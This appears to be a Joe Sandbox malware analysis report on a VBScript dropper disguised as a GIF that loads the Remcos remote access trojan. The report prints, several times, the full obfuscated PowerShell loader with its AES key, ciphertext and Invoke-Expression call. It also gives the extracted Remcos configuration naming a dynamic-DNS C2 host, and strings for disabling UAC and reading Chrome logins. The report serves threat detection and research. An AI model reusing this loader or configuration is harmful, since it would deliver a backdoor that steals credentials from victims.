Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
createactiveimagesbeautygirlfrnd.gIF.vbs

Overview

General Information

Sample name:createactiveimagesbeautygirlfrnd.gIF.vbs
Analysis ID:1483436
MD5:fd92f8bccf35e72fe49bab1b596eefce
SHA1:40ecaf11bef8907906b8ddea0ae7d90098a4cebc
SHA256:bfae575fb0e846ba3d7929e3d8a8e593dcd529ed6ff2f0f6d6378339b0f10aa8
Tags:vbs
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Cscript/Wscript Uncommon Script Extension Execution
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1904 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 6048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "2024remcmon.duckdns.org:14645:1", "Assigned name": "zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R2I0JW", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x15f20:$a1: Remcos restarted by watchdog!
      • 0x16498:$a3: %02i:%02i:%02i:%03i
      00000004.00000002.2488829216.000000000122B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          4.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            4.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              4.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6c4a8:$a1: Remcos restarted by watchdog!
              • 0x6ca20:$a3: %02i:%02i:%02i:%03i
              4.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
              • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6656c:$str_b2: Executing file:
              • 0x675ec:$str_b3: GetDirectListeningPort
              • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x67118:$str_b7: \update.vbs
              • 0x66594:$str_b9: Downloaded file:
              • 0x66580:$str_b10: Downloading file:
              • 0x66624:$str_b12: Failed to upload file:
              • 0x675b4:$str_b13: StartForward
              • 0x675d4:$str_b14: StopForward
              • 0x67070:$str_b15: fso.DeleteFile "
              • 0x67004:$str_b16: On Error Resume Next
              • 0x670a0:$str_b17: fso.DeleteFolder "
              • 0x66614:$str_b18: Uploaded file:
              • 0x665d4:$str_b19: Unable to delete:
              • 0x67038:$str_b20: while fso.FileExists("
              • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
              4.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x6637c:$s1: CoGetObject
              • 0x66390:$s1: CoGetObject
              • 0x663ac:$s1: CoGetObject
              • 0x70338:$s1: CoGetObject
              • 0x6633c:$s2: Elevation:Administrator!new:
              Click to see the 15 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_3092.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi64_3092.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs", ProcessId: 1904, ProcessName: wscript.exe
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = 